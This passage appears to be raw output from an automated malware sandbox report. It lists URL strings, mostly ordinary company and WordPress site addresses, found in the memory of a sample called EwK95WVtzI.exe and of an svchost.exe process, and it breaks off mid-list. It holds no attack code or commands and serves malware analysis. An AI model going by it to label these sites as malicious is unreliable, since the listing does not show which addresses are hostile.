                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1696184345
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1696184345
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=26c380492a5e27db8a41
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=26c380492a5e27db8a412ecd
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26c380492a5e27db8a412ecdd
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26c380492a5e27db8a412ecddcdea59d
                Source: svchost.exe, 00000008.00000002.2788073238.0000000007012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shteeble.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/serviceplaner
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://typo3.org/
                Source: svchost.exe, 00000008.00000002.2788073238.0000000007012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vivastay.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1474529318.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1480659952.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://webeasy.com.hk
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://wpa.qq.com/msgrd?v=3&uin=2938350997&site=qq&menu=yes
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/WM~
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000166B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/z%
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/=
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
                Source: EwK95WVtzI.exe, 00000000.00000003.2362049837.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.NameBright.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/Kw3
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/_
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 